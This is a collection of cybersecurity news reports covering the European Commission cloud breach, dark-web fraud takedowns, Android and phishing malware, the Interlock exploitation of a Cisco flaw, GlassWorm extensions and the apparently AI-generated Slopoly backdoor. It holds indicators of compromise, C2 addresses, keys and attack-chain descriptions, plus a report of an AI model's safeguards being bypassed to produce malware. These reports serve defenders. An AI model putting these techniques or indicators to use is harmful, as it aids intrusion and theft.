Investigators from CERT-EU say, with high confidence, that the European Commission cloud breach began with a supply-chain compromise involving Trivy, a widely used security scanning tool. The malicious version, attributed to a threat actor known as TeamPCP, was unknowingly used within the Commission’s environment after being delivered through standard update channels. On March 19, the attacker obtained an AWS secret, an API key—with management-level permissions. That single key became the gateway into the Commission’s cloud infrastructure. From there, the activity was deliberate. The attacker attempted to uncover more credentials using TruffleHog, a tool designed to scan for secrets and validate access through AWS Security Token Service (STS). They also created a new access key tied to an existing user, an attempt to maintain access while avoiding detection. The European Commission cloud breach did not rely on breaking in. It relied on blending in.

Data Theft and Dark Web Leak

The impact became clearer days later. A large volume of data, around 91.7 GB compressed, or roughly 340 GB uncompressed—was exfiltrated from the compromised AWS account. On March 28, the data extortion group ShinyHunters published the dataset on its dark web leak site. The group claimed it included “data dumps of mail servers, datavases [sic], confidential documents, contracts, and much more sensitive material”. Early analysis confirms that the European Commission cloud breach exposed personal data, including names, usernames, and email addresses. The dataset also contains more than 51,000 files linked to outbound email communications. While most of these emails are automated notifications, some “bounce-back” messages may include original user-submitted content. That detail matters, as it raises the risk of unintended personal data exposure across systems that rely on user interaction.

Wider Impact Across EU Entities

The European Commission cloud breach goes beyond a single institution. The compromised AWS account is part of the infrastructure behind the “europa.eu” web hosting platform, which supports dozens of websites. Data linked to up to 71 clients may be affected, 42 internal European Commission services and at least 29 other Union entities. This shared infrastructure model is efficient, but it also means that one compromised component can have a broader footprint. Despite this, officials have confirmed that no websites were defaced, taken offline, or altered during the incident. There were no service disruptions. But the absence of visible damage should not be mistaken for limited impact.

Timeline Shows Speed of Supply-Chain Attacks

The timeline of the European Commission cloud breach highlights how quickly such incidents can unfold:

• March 19: AWS credential obtained via compromised Trivy tool
• March 24: Alerts triggered over unusual API activity and traffic spikes
• March 25: CERT-EU notified; access secured and keys revoked
• March 27: Public disclosure by the European Commission
• March 28: Data published by ShinyHunters

In less than ten days, the attack moved from initial access to public data exposure.

Response and Containment Efforts

The European Commission acted quickly once the breach was identified. The compromised AWS secret was secured, newly created access keys were disabled, and all known exposed credentials were deactivated or deleted. Authorities also followed regulatory protocol, informing data protection bodies, including the European Data Protection Supervisor (EDPS), and notifying impacted entities. Direct communication with affected clients began on March 31. Importantly, the Commission has stated that its internal systems were not affected. However, the European Commission cloud breach remains under active investigation, particularly as analysis of the exposed databases continues.

A Familiar Weakness, Repeating

If the European Commission cloud breach feels familiar, it’s because the pattern is becoming more common. Attackers are no longer forcing their way in, they are entering through trusted software, CI/CD pipelines, and third-party tools. The compromised Trivy version was not flagged as malicious during installation. It behaved as expected—until it didn’t. This is the real shift. Security teams are being asked to defend not just their infrastructure, but every dependency connected to it.

What This Breach Really Signals

The European Commission cloud breach is not just about one incident or one tool. It reflects a deeper issue: the growing difficulty of verifying trust in modern software ecosystems. Cloud environments, automation pipelines, and open-source tools have made operations faster and more efficient. But they have also introduced new blind spots. The lesson here is uncomfortable but clear—security controls worked, but they worked late. Detection came after access had already been established and data had already moved. And that is where the real risk lies.

A 35-year-old man operating from China ran the largest fraudulent dark web network ever dismantled and the most disturbing detail is not the scale of the infrastructure he built, but what he was selling — child sexual abuse material that did not exist, to thousands of buyers who paid for it anyway.

On March 9, a global operation led by German authorities and supported by Europol was launched against one of the largest networks of fraudulent platforms in the dark web. The investigation began in mid-2021 against the dark web platform "Alice with Violence CP." During the investigation, authorities discovered that the platform's operator ran more than 373,000 fraudulent websites advertising child sexual abuse material and cybercrime-as-a-service offerings.

The first phase of Operation Alice ran for 10 days, with 23 countries joining forces. The participating nations included Spain, Germany, the United States, the United Kingdom, Ukraine, Mexico, Canada, and Australia. Europol facilitated intelligence exchange, provided analytical support, coordinated the international response, and played a critical role in tracing cryptocurrency payments across jurisdictions.

The criminal model this operator constructed sits at an unusual intersection of two distinct threats that security teams rarely analyze together. From February 2020 to July 2025, the suspect advertised child sexual abuse material on different platforms accessible through more than 90,000 of those onion domains. The perpetrator offered material in purchasable packages after buyers provided an email address and made a payment in Bitcoin, with each package costing between €17 and €215 and promising data volumes ranging from a few gigabytes to several terabytes.

The material was never delivered. Customers were tricked into providing payment for these products but received nothing in return. Europol estimated the suspect made around €345,000 — approximately $400,000 — from around 10,000 people who attempted to buy the illicit material.

Not Just Any Other Dark Web Economy

The fraud architecture layered two criminal economies on top of each other. Alongside child abuse material, the platform also offered cybercrime-as-a-service listings — including stolen credit card data and access to compromised backend computer systems — extending the operator's reach from child exploitation into enterprise-grade cybercrime services.

The CaaS dimension means the operator's customer base included not only individuals seeking abuse material but also cybercriminals seeking ready-made access to corporate networks, broadening the downstream harm considerably.

The infrastructure scale alone places this case in a different category from any previous dark web takedown. The dark web runs on onion domains — a special type of website address engineered specifically to conceal the identity and location of both the operator and visitors by routing traffic through layered encryption relays.

Over nearly five years of investigation, German authorities discovered that a single individual operated over 373,000 onion domains on the dark web. Managing that volume of infrastructure requires automation, deliberate operational security planning, and sustained technical capability.

Operation Alice initially only targeted the platform operator. However, through international cooperation, the investigation uncovered the identities of 440 customers who had used the operator's services. Due to the nature of the purchases, additional investigations were launched against them, and the operation remains ongoing against more than 100 of those individuals.

The operational results include the seizure of 105 servers along with computers, mobile phones, and electronic storage devices. Investigators also seized the financial proceeds generated across five years of operation.

Also read: FBI and Europol Dismantle LeakBase Cybercrime Forum With 142,000 Users

In this week’s cybersecurity roundup, The Cyber Express covers key global security developments, including a major supply chain disruption affecting a global manufacturer, rising concerns over security and legal risks linked to rapid AI adoption, and the continued escalation of cyber activity driven by geopolitical tensions.

Across industries, organizations are facing a mix of disruptive attacks and long-term espionage campaigns targeting both operational systems and critical infrastructure. Intelligence reports also continue to highlight sustained nation-state activity shaping the global threat landscape.

These developments reflect a cybersecurity environment where operational resilience, secure technology adoption, and coordinated defense strategies are increasingly essential to managing interconnected and fast-evolving risks.

The Cyber Express Weekly Roundup 

Stryker Cyberattack Disrupts Supply Chain, Recovery Timeline Unclear 

A cyberattack on Stryker Corporation has disrupted manufacturing, shipping, and order processing operations, with no clear recovery timeline announced. While internal systems were impacted, customer products have not been affected. The incident has been linked to the Handala group, and authorities, including the Cybersecurity and Infrastructure Security Agency (CISA), are currently investigating the attack. Read more… 

AI Legal Risks Rise as Businesses Rush Adoption, Expert Warns 

Cybersecurity expert Lisa Fitzgerald has warned that rapid adoption of AI tools without proper governance can expose organizations to data breaches, regulatory violations, and loss of control over sensitive information. In an interview with The Cyber Express, she emphasized the importance of structured risk assessments, employee training, and clear governance frameworks to manage AI-related risks effectively. Read more… 

Bonnie Butlin Highlights Role of Collaboration in Modern Security 

Bonnie Butlin has stressed the importance of global collaboration in addressing complex cyber, physical, and geopolitical threats. She highlighted the need to break down industry silos, strengthen cross-sector cooperation, and build more inclusive leadership models to improve resilience against evolving risks. Read more… 

US Intel Warns China Is Top Cyber Threat Ahead of Other Nation-States 

A new U.S. intelligence assessment identifies China as the most persistent cyber threat actor, with ongoing operations reportedly embedded within critical infrastructure systems. The report also highlights cyber activities from Russia, North Korea, and Iran, each employing different tactics ranging from espionage and sabotage to cybercrime and disinformation campaigns. Read more… 

Middle East Cyber Warfare Intensifies Amid Rising Geopolitical Conflict 

According to Cyble Research and Intelligence Labs, cyberattacks in the Middle East are increasing in parallel with ongoing geopolitical tensions. Critical sectors such as energy, finance, and communications have been identified as primary targets in this escalating cyber conflict landscape. Read more… 

Also Read: Top 50 Women Leaders in Cybersecurity to Watch in 2026

Weekly Takeaway 

This week’s The Cyber Express weekly roundup highlights the growing complexity of the global cybersecurity environment, from supply chain disruptions and AI governance risks to escalating nation-state cyber operations and regional cyber warfare.  Organizations, governments, and individuals must remain vigilant, prioritize strong governance frameworks, and adopt proactive security measures, including timely patching and continuous monitoring, to effectively respond to the evolving threat landscape. 

A new Android malware campaign targeting Indian users has been reported by the Indian Computer Emergency Response Team, CERT-In. According to the agency, multiple reports indicate a coordinated effort by cybercriminals to steal sensitive financial and personal data through deceptive mobile applications and phishing techniques.  The ongoing Android malware campaign revolves around fraudulent messages posing as official eChallan or RTO Challan alerts. Victims typically receive SMS notifications claiming that a traffic violation has been recorded against their vehicle. These messages often include alarming language such as legal threats or additional penalties, urging immediate action. 

Android Malware Campaign Exploits eChallan and RTO Challan Trust 

A common message reads: “Your vehicle challan has been generated. Download the receipt from the link below.” The link or attachment leads users to download malicious APK files named “RTO Challan.apk,” “RTO E Challan.apk,” or even “MParivahan.apk.”  As highlighted by CERT-In, these files act as entry points for a multi-stage malware infection. Once installed, the application appears in the app drawer, giving the illusion of legitimacy. However, it is only a dropper component. The actual malicious payload is deployed when users tap on prompts like “Install Update.” 

Multi-Stage Malware and Device Compromise 

Once activated, the malware continues the eChallan theme but becomes invisible to the user by not appearing in the app list. At this stage, it aggressively requests sensitive permissions, including access to SMS messages, phone calls, and background activity.  This level of access allows attackers to maintain persistence on the device without detection. In some cases, the malware also requests permission to establish a VPN connection, enabling threat actors to monitor and intercept internet traffic.  The ultimate goal of this Android malware campaign is financial theft. Fake interfaces resembling legitimate RTO Challan or banking pages are displayed to trick users into entering sensitive information such as card details and login credentials. 

Parallel Rise of Browser-Based eChallan Phishing 

Last year, Cyble Research and Intelligence Labs (CRIL) reported a related surge in browser-based phishing attacks leveraging the eChallan ecosystem. Unlike APK-based threats, this variation does not require users to install any application, significantly lowering the barrier for compromise.  These phishing campaigns begin similarly, with SMS messages targeting Indian vehicle owners. The messages contain deceptive URLs that mimic official eChallan portals. Once clicked, users are redirected to cloned websites that closely replicate government platforms, complete with official insignia and branding.  At the time of investigation, many of these phishing domains remained active, indicating an ongoing and well-maintained operation rather than isolated incidents. 

Anatomy of the Phishing Attack 

The browser-based eChallan fraud follows a structured attack chain: 

• Stage 1: SMS Delivery: Victims receive messages claiming overdue fines, often with threatening language about legal action. The sender appears as a regular mobile number, increasing credibility. 
• Stage 2: Fake Portal Redirection: Clicking the link redirects users to phishing domains hosted on IP addresses such as 101[.]33[.]78[.]145. Interestingly, some pages are originally written in Spanish and translated into English, suggesting reuse of global phishing templates. 
• Stage 3: Fabricated Challan Generation: Users are asked to input details like vehicle number, challan number, or driving license number. Regardless of the input, the system generates a realistic-looking challan, often with a fine amount such as INR 590 and a near-term deadline. This psychological tactic reinforces trust. 
• Stage 4: Financial Data Harvesting: When users proceed to payment, they are directed to a fake payment page that only accepts credit or debit cards. No legitimate payment gateway is used. Instead, sensitive details like CVV, expiry date, and cardholder name are captured directly. Testing revealed that even invalid card entries are accepted, confirming that data is harvested regardless of transaction success. 

Shared Infrastructure and Expanding Threat Landscape 

Investigations revealed that this Android malware campaign and related phishing operations are supported by a shared backend infrastructure. Multiple domains impersonating eChallan, logistics services like DTDC and Delhivery, and financial institutions were hosted on the same IP addresses.  Over 36 phishing domains linked to RTO Challan scams were identified on a single server. Another IP, 43[.]130[.]12[.]41, hosted additional domains mimicking Parivahan services using deceptive naming patterns such as “parizvaihen[.]icu.” 

Amazon’s threat intelligence teams have uncovered a new cyber campaign linked to the Interlock ransomware group. The campaign centers around a flaw affecting Cisco Secure Firewall Management Center (FMC) software. The vulnerability, tracked as CVE-2026-20131, was disclosed by Cisco on March 4. It allows an unauthenticated remote attacker to execute arbitrary Java code with root privileges on affected FMC devices. However, research conducted through Amazon MadPot, a global honeypot network designed to observe malicious activity, revealed that Interlock had already begun exploiting this flaw as early as January 26, 2026, 36 days before public disclosure.  This meant the attackers were operating with a zero-day advantage, enabling them to compromise organizations before defenders were even aware of the risk. According to Amazon’s findings, the exploitation involved crafted HTTP requests targeting specific paths in vulnerable systems. These requests carried embedded Java code and URLs—one delivering configuration data to support the exploit, and another confirming successful compromise by triggering an HTTP PUT request from the victim system.  To deepen the investigation, researchers simulated a compromised device by responding to the attacker’s verification mechanism. This triggered the next phase of the attack, where Interlock issued commands to download and execute a malicious Linux binary. 

Amazon MadPot Reveals Interlock’s Toolkit 

The use of Amazon MadPot proved critical in exposing the full scope of the operation. A misconfigured infrastructure server used by the attackers inadvertently revealed their entire toolkit. This included reconnaissance scripts, custom remote access trojans (RATs), and evasion mechanisms, offering rare visibility into Interlock’s multi-stage attack chain.  The infrastructure was organized in a way that separated data by target, with directories used both to distribute tools and collect stolen information. This level of organization reflects a structured and repeatable attack methodology.  Importantly, Amazon confirmed that its own cloud infrastructure and customer workloads were not impacted by this campaign. 

Interlock Ransomware Tactics and Attribution 

The recovered malware and artifacts were attributed to the Interlock ransomware family based on several consistent indicators. These included a ransom note and a TOR-based negotiation portal aligned with Interlock’s known branding and operational style.  The ransom notes notably referenced multiple data protection regulations, a tactic used by Interlock to pressure victims by threatening not only data encryption but also potential regulatory penalties. Each victim was assigned a unique organization identifier, consistent with the group’s tracking model.  Historically, Interlock has targeted industries where disruption creates maximum leverage. The education sector has been the most affected, followed by engineering, construction, manufacturing, healthcare, and public sector organizations.  Temporal analysis of the attack activity suggests the operators likely function in a UTC+3 time zone, with activity typically beginning around 08:30, peaking between 12:00 and 18:00, and declining overnight. 

Post-Exploitation 

Once access is gained through CVE-2026-20131, Interlock deploys a range of tools to expand control within the compromised network. A PowerShell-based reconnaissance script systematically collects detailed system and network information, including installed software, running services, browser data, and active connections.  The script organizes this data into per-host directories on a centralized network share, compressing it into ZIP archives for exfiltration. This structured approach indicates preparation for large-scale ransomware deployment across multiple systems.  Interlock uses multiple RATs to maintain persistent access. One variant, written in JavaScript, suppresses debugging output and gathers system details before establishing encrypted communication with command-and-control servers via WebSockets. Messages are encrypted using RC4 with unique keys for each transmission.  A second variant, implemented in Java, provides the same capabilities using different libraries. This dual-implementation strategy ensures continued access even if one version is detected and removed.  To hide their tracks, Interlock employs a Bash script that converts compromised Linux servers into HTTP reverse proxies. These proxies forward traffic to attacker-controlled systems while erasing logs every five minutes, making forensic analysis extremely difficult. 

Fileless Backdoors and Advanced Techniques 

One of the more advanced components observed in the campaign is a memory-resident webshell. Delivered as a Java class, it operates entirely in memory, avoiding disk-based detection. It intercepts HTTP requests and executes encrypted payloads dynamically within the Java Virtual Machine.  Additionally, a lightweight TCP server tool was identified, used to verify successful exploitation by confirming connectivity on a specific port.  Interlock also blends malicious activity with legitimate software. The group deployed ConnectWise ScreenConnect, a commercial remote desktop tool, to maintain access while avoiding detection. This redundancy ensures attackers retain control even if custom malware is removed.  Other tools found in the attack environment include Volatility, typically used for memory forensics, and Certify, an offensive security tool targeting Active Directory Certificate Services. These tools enable credential access, privilege escalation, and persistent footholds within compromised environments. 

The first contact often seems harmless, a friendly message, casual conversation, or even a budding online romance. But for many Americans, these interactions mark the beginning of a devastating financial scam. Authorities say these crimes trace back to organized scam centers in Southeast Asia. Now, the FBI in Thailand is working closely with regional partners to dismantle these operations and protect Americans from losing billions of dollars each year.  According to U.S. officials, these scam centers are not small-time operations. Instead, they are large, coordinated criminal enterprises operating out of fortified compounds. Victims are often lured through social media or messaging platforms, where scammers build trust over time.   In some cases, fraudsters pose as romantic partners; in others, they promote cryptocurrency investments, promising quick returns. Weeks or months later, victims find their savings gone, transferred overseas, converted into digital assets, and scattered across complex financial networks. 

How Scam Centers Target Americans Through Deception and Trust 

Speaking during a Department of State media briefing on February 24, 2026, FBI Deputy Assistant Director Scott Schelble described these scam centers as “industrial-scale fraud operations.” He emphasized that Americans are losing billions of dollars annually, with many victims suffering not only financial ruin but also emotional distress. Retirees, small-business owners, and individuals seeking companionship are among the most frequently targeted.  Schelble explained that these scam centers operate with a structure similar to legitimate corporations. Workers are often recruited through fake job advertisements promising high salaries abroad. Once they arrive, however, their passports are confiscated, and they are forced to work under threat of violence. Armed guards monitor the compounds, and trafficked individuals are made to follow scripted interactions designed to extract as much money as possible from victims.  One of the fastest-growing fraud methods linked to these scam centers is known as “pig butchering.” In this scheme, scammers gradually build relationships with victims, often starting with messages sent to wrong numbers. Over time, they introduce investment opportunities, typically involving cryptocurrency. Victims are shown convincing, but entirely fake, platforms displaying large profits. When they attempt to withdraw funds, they are asked to deposit additional money for fees or taxes. Eventually, the platform disappears, along with their investment.  Americans are losing billions of dollars a year to these types of scams. And in many cases, victims lose their life savings,” Schelble said. 

FBI Expands Operations Against Scam Centers in Thailand

Rather than focusing solely on individual scammers, investigators are targeting the broader networks that support these operations. This includes tracking cryptocurrency transactions, identifying financial intermediaries, and collaborating with banks and exchanges to freeze suspicious accounts.  In August 2025, the FBI’s Bangkok office formed a joint task force with the Royal Thai Police to address the issue. The effort has since expanded, with agents rotating into Thailand on six-month assignments to support investigations. Additional personnel have also been deployed with assistance from the U.S. Department of State.  [caption id="attachment_110256" align="aligncenter" width="446"] FBI’s Ben Virtue and Thai police with phones seized from scam centers (Source: FBI)[/caption] Ben Virtue, the FBI’s law enforcement attaché in Bangkok, highlighted the importance of international cooperation. “We’re working the problem together,” he said. “The Royal Thai Police are true partners in this fight against the organized crime syndicates running these scam compounds. Without their partnership, this would not be possible.”  Recent operations by the task force have yielded good results. Authorities seized more than 8,000 phones and 1,300 hard drives from suspected scam centers, providing valuable evidence for ongoing investigations. In parallel efforts, a major technology company disabled over 150,000 accounts linked to scam networks, while Thai authorities arrested 21 individuals connected to these activities.  The U.S. Department of Justice has also stepped in, establishing a Scam Center Strike Force in November 2025. The initiative focuses on combating cryptocurrency-related fraud tied to Southeast Asian scam centers. So far, the strike force has frozen and seized more than $580 million in digital assets. 

A new AI-driven phishing campaign, uncovered by Cyble Research & Intelligence Labs (CRIL) demonstrates how attackers are moving beyond traditional credential theft and adopting more invasive, technology-driven tactics.  According to CRIL, the campaign has been active since early 2026 and relies on a wide range of social engineering lures, including themes like ID scanner, Telegram ID freezing, and “Health Fund AI.” These deceptive entry points are designed to trick users into granting access to hardware features such as cameras and microphones under the guise of verification or account recovery.  Once permissions are granted, the malicious scripts begin collecting extensive data. This includes images, video recordings, microphone audio, device specifications, contact details, and approximate geographic location. The stolen data is then transmitted to attacker-controlled systems via Telegram bots, making exfiltration quick and efficient.  Researchers also noted signs of AI-assisted code generation within the campaign’s infrastructure. Structured annotations and unusual emoji-based formatting embedded in the scripts suggest the use of generative AI tools to streamline development and deployment. 

Infrastructure and Attack Mechanism 

The campaign primarily uses the edgeone.app platform to host phishing pages, enabling scalable and low-cost deployment. These pages impersonate well-known platforms such as TikTok, Instagram, Telegram, Google Chrome, and even games like Flappy Bird to gain user trust.  [caption id="" align="aligncenter" width="496"] Campaign Overview (Source: Cyble)[/caption] Unlike traditional phishing attacks that rely on victims entering credentials, this AI-driven phishing campaign focuses on browser-level permissions. Once a user interacts with a phishing page, JavaScript code triggers permission prompts. If accepted, the script activates the device camera and begins capturing live data.  [caption id="" align="aligncenter" width="529"] JavaScript Implementation Used for Browser-Based Photo Capture (Source: Cyble)[/caption] A key technique involves rendering a frame from a live video stream onto an HTML5 canvas using ctx.drawImage(), then converting it into a JPEG file via canvas.toBlob(). This file is immediately transmitted to attackers through the Telegram Bot API. The same process is used for video and audio recordings. 

Expanded Data Collection Capabilities 

The phishing framework goes beyond simple media capture. It performs extensive device fingerprinting using browser APIs such as: 

• navigator.userAgent 
• navigator.platform 
• navigator.deviceMemory 
• navigator.hardwareConcurrency 
• navigator.connection 
• navigator.getBattery 

Through these methods, attackers gather detailed information about the victim’s device, including operating system, browser version, CPU capacity, RAM, network type, and battery status.  Additionally, the script retrieves the victim’s IP address via external services and enriches it with geolocation data such as country, city, latitude, and longitude. This information is aggregated and sent to attackers before further data collection begins.  [caption id="" align="aligncenter" width="491"] Script Fetching Victim IP and Geolocation via External APIs (Source: Cyble)[/caption] The campaign also attempts to access contact lists using the browser’s Contacts Picker API. If users grant permission, names, phone numbers, and email addresses are extracted and transmitted. 

Role of Telegram in Data Exfiltration 

A notable aspect of this campaign is its reliance on Telegram for command-and-control (C2) operations. By using Telegram bots, attackers eliminate the need for complex backend infrastructure. Data such as images, videos, and audio files are sent directly via API methods like sendPhoto, sendVideo, and sendAudio.  This approach simplifies operations while providing attackers with immediate access to stolen information. 

User Interface Deception 

To maintain credibility, phishing pages display realistic status messages such as “Capturing photo,” “Sending to server,” and “Photo sent successfully.” These prompts mimic legitimate verification workflows, reinforcing the illusion of authenticity.  Once the data is captured and transmitted, the script shuts down the camera and resets the interface, leaving minimal visible traces of the attack. 

Risks and Business Impact 

The implications of this AI-driven phishing campaign are significant. By collecting biometric and contextual data, attackers gain powerful tools for: 

• Identity theft and account takeover 
• Bypassing video-based verification systems 
• Targeted social engineering attacks 
• Extortion using captured multimedia 

For example, images and audio recordings could be used to impersonate victims or bypass KYC (Know Your Customer) systems. Device and location data allow attackers to craft highly personalized attacks, increasing their success rate.  Organizations face additional risks, including reputational damage, regulatory exposure, and financial losses. The use of impersonated brands further amplifies the threat by eroding trust in legitimate digital services.  One of the more unusual findings in this campaign is the presence of emojis embedded within the script’s operational logic. While uncommon in manually written malware, such patterns are linked to AI-assisted code generation. This suggests attackers may be leveraging generative AI tools to accelerate development and scale their operations. 

A large-scale malicious campaign tied to GlassWorm has expanded within the ecosystem of open VSX extensions, introducing a method of spreading malware through developer tools. Researchers identified at least 72 additional malicious open VSX extensions beginning January 31, 2026, including several that function as transitive GlassWorm loader extensions aimed at developers.  Rather than reappearing as a completely new operation, GlassWorm has evolved its tactics. Recent analysis shows a notable escalation in how the campaign spreads through open VSX extensions, shifting from directly embedding malicious code into every extension to exploiting the extension relationship mechanisms within the Visual Studio Code ecosystem. 

GlassWorm Exploits Extension Relationships

The campaign abuses two extension manifest fields commonly used by open VSX extensions and compatible editors: extensionPack and extensionDependencies. These fields allow one extension to automatically install additional extensions when the primary extension is installed.  Both settings are declared inside an extension’s package.json file and reference other extensions using the publisher.name identifier. In legitimate scenarios, this functionality provides convenience for developers. For example, extension packs can bundle multiple tools together so that a developer setting up a particular environment can install them all at once.  A legitimate example cited in official documentation shows how a PHP development pack might bundle debugging and language tooling: 

{  "extensionPack": ["xdebug.php-debug", "zobo.php-intellisense"] } 

However, GlassWorm operators have repurposed this functionality to distribute malware indirectly through open VSX extensions.  Because these manifest fields do not require extensions to share the same publisher or namespace, any extension author can reference any other extension. This design allows attackers to publish seemingly harmless extensions that later become indirect malware installers. 

Transitive Delivery Expands the GlassWorm Attack Surface 

Unlike earlier iterations where malicious code was embedded directly in extensions, the newer GlassWorm approach enables transitive malware delivery. A benign-looking extension can later be updated to include an extensionPack or extensionDependencies entry that installs a separate malicious extension.  One confirmed example involves otoboss.autoimport-extension, where version 1.5.7 includes an extensionPack reference to oigotm.my-command-palette-extension, while version 1.5.6 references federicanc.dotenv-syntax-highlighting, which has been confirmed as GlassWorm-linked.  Additional live cases were also identified, including: 

• twilkbilk.color-highlight-css 
• crotoapp.vscode-xml-extension 

These examples illustrate how open VSX extensions that initially appear harmless can later become indirect malware distribution points. This approach reduces visibility of the malicious component and complicates detection efforts.  The strategy also undermines traditional extension reviews. Security teams can no longer rely on examining only the initial release of an extension, since malicious dependencies may be introduced in later updates. 

Inflated Downloads and Impersonated Tools 

Many of the malicious open VSX extensions in the GlassWorm campaign impersonate widely used developer tools to increase credibility. These include utilities such as linters, formatters, code runners, and language tools for frameworks, including Angular, Flutter, Python, and Vue.  Other impersonated tools include: 

• vscode-icons 
• WakaTime 
• Better Comments 

The campaign also targets AI development tools, including extensions related to Claude Code, Codex, and Antigravity.  Some extensions showed download counts in the thousands, likely manipulated by the threat actor to make the packages appear legitimate. One example, twilkbilk.color-highlight-css, displayed 3.5K reported downloads while impersonating the legitimate color-highlight extension.  In another case, daeumer-web.es-linter-for-vs-code uses a publisher name that is a typosquat of the legitimate ESLint publisher dbaeumer.  As of March 13, 2026, the Open VSX registry removed many of the transitively malicious extensions. However, some listings, including twilkbilk/color-highlight-css and crotoapp/vscode-xml-extension, were still active at the time of analysis, indicating that takedown efforts were ongoing. 

GlassWorm Loader Evolution and Infrastructure Changes 

While the distribution method has evolved, the underlying GlassWorm loader retains several recognizable characteristics.  The latest variants still rely on: 

• Staged JavaScript execution 
• Russian locale and timezone geofencing 
• Solana transaction memos used as dead drops 
• In-memory follow-on code execution 

However, several operational changes indicate an effort to improve resilience and evade detection.  For example, the campaign rotated Solana wallet infrastructure from: 

• BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC 

to 

• 6YGcuyFRJKZtcaYCCFba9fScNUvPkGXodXE1mJiSzqDJ 

The operation also introduced additional command-and-control IP addresses, including: 

• 45.32.151.157 
• 70.34.242.255 

At the same time, it continues to reuse 45.32.150.251, suggesting continuity with earlier GlassWorm activity.  Other technical modifications include: 

• Continued use of the Solana memo program MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr 
• Replacement of the earlier static AES-wrapped loader with heavier RC4, base64, and string-array obfuscation 
• Relocation of decryption keys from the extension code into HTTP response headers, specifically ivbase64 and secretkey 

Security analysts also highlighted embedded cryptographic indicators, such as: 

• AES key: wDO6YyTm6DL0T0zJ0SXhUql5Mo0pdlSz
• AES IV: c4b9a3773e9dced6015a670855fd32b

Researchers have identified a suspected case of AI-generated malware being used during a ransomware attack. The malware, which analysts dubbed "Slopoly," was linked to a financially motivated cybercrime group tracked as Hive0163. The appearance of Slopoly in an active ransomware intrusion suggests that cybercriminal groups are beginning to experiment with AI-generated malware as part of their operational toolkit. 

Hive0163 and the Experimentation with AI-generated Malware 

Hive0163 is a cluster of financially motivated threat actors known for conducting ransomware campaigns that focus on large-scale data theft and extortion. The group has been associated with several global ransomware incidents involving Interlock ransomware, as well as a range of custom backdoors and loaders such as NodeSnake, InterlockRAT, and the JunkFiction loader.  During a ransomware investigation in early 2026, IBM X-Force analysts discovered that Hive0163 deployed Slopoly, a suspected AI-generated malware framework designed to maintain persistent access to a compromised server. According to the investigation, the attackers retained access to the infected machine for more than a week using the malware.  Notably, Slopoly was deployed during the later stages of the attack, suggesting the operators may have been testing the AI-generated framework in a real-world scenario. Researchers described the situation as resembling a “live-fire exercise,” where the threat actors experimented with the new tool during an active operation.  The naming conventions of variables within the script indicated that the system generating the code was explicitly instructed to produce malicious functionality. This suggests that any safety guardrails implemented in the underlying AI model were successfully bypassed. However, researchers were unable to determine which specific model generated Slopoly, although the overall quality suggested it was likely produced by a relatively less advanced system. 

Slopoly is a Suspected LLM-generated C2 Tool 

The Slopoly malware was discovered as a PowerShell script on an infected server. Analysis revealed that the script functioned as the client component of a command-and-control (C2) framework used by Hive0163.  Investigators believe the malware was generated through a builder tool that automatically inserted configuration data such as a session ID, mutex name, C2 server address, and beacon intervals. The builder reportedly deployed Slopoly into the directory C:\ProgramData\Microsoft\Windows\Runtime\ and established persistence by creating a scheduled task named “Runtime Broker.”  Several characteristics strongly suggested that Slopoly was produced using a large language model. The script contained extensive comments, structured logging functions, clear error handling routines, and well-named variables, features commonly seen in AI-generated malware and AI-assisted programming.  Another clue pointing to AI-assisted development was the presence of an unused “Jitter” function within the code. Researchers believe this may have been left over from iterative development with an LLM.  Interestingly, the script’s internal comments describe it as a “Polymorphic C2 Persistence Client.” In practice, however, the malware does not exhibit true polymorphic behavior. It cannot modify its own code during execution. Instead, the builder likely generates new variants of the malware with randomized configuration values and function names, a common technique used by malware builders. 

How Slopoly Operates on Infected Systems 

Despite its limited technicalities, Slopoly operates as a functional backdoor. After execution, it collects basic system information from the infected machine and sends it to a remote command-and-control server.  The data is transmitted in JSON format using an HTTP POST request to the /api/commands endpoint. A typical beacon includes information such as the public IP address of the infected system, the user account name, the computer name, and whether the process is running with elevated privileges.  The malware sends a heartbeat message every 30 seconds and checks for new commands roughly every 50 seconds. Any instructions received from the C2 server are executed using cmd.exe, and the results are returned to the server.  The malware also maintains a detailed log file named persistence.log, which records activity and rotates once it reaches a size of 1 MB. 

Initial Infection Through ClickFix 

The attack investigated by the researchers began with a social engineering technique known as ClickFix. This method tricks victims into executing malicious PowerShell commands themselves.  Victims are typically shown a CAPTCHA-style verification page that secretly copies a malicious script into the clipboard. The page then instructs users to press a sequence of keyboard commands—“Win+R” to open the Windows Run dialog, followed by “Ctrl+V” to paste the script and “Enter” to execute it.  Once executed, the PowerShell payload installs NodeSnake, a NodeJS-based malware that serves as the first stage of a larger command-and-control framework used by Hive0163.  NodeSnake supports multiple commands, including downloading and executing payloads, running shell commands, establishing persistence, updating itself, or terminating its own process.  In the observed attack, NodeSnake eventually deployed a more advanced JavaScript-based backdoor known as InterlockRAT, which supports WebSocket communications, reverse shell access, and SOCKS5 tunneling capabilities. 

Ransomware Deployment and Encryption 

The final stage of the intrusion involved the deployment of Interlock ransomware, packaged using the JunkFiction loader. Once executed, the ransomware scans logical drives and encrypts targeted files across the system.  Interlock uses a combination of AES-GCM encryption and RSA cryptography through the OpenSSL library (version 3.5.0). Each encrypted file receives a unique session key, which is then protected using an attacker-controlled RSA public key.  Encrypted files are typically renamed with extensions such as . !NT3RLOCK or .int3R1Ock. After completing the encryption process, the ransomware drops a ransom note, often named FIRST_READ_ME.txt, containing instructions for victims to contact the attackers. 

Cyber operations no longer occur only during wartime. Digital activity now runs continuously alongside diplomacy, sanctions, and military tensions. This has become particularly visible amid escalating hostilities involving Iran, Israel, and the United States, where intelligence agencies have warned of possible retaliatory cyber activity linked to the conflict. In this environment, cyber warfare 2026 is highlighted by persistent nation-state cyberattacks, covert intrusion campaigns, and strategic influence operations.  Governments, telecommunications networks, cloud platforms, and identity systems have become the primary targets. Threat researchers point to three converging factors: ongoing state-sponsored cyber threats, a mature cybercriminal ecosystem that sells infrastructure and access, and automation technologies that enable scalable phishing, impersonation, and cyber espionage 2026 operations.  These dynamics have turned cyberspace into a strategic domain of conflict. Espionage, disruption, influence operations, and financial crime frequently overlap, reflecting the realities of hybrid warfare cybersecurity. As geopolitical tensions rise, organizations face geopolitical cyber risk, where real-world conflicts are mirrored in the digital domain. 

Cyber Warfare 2026: What We Know So Far 

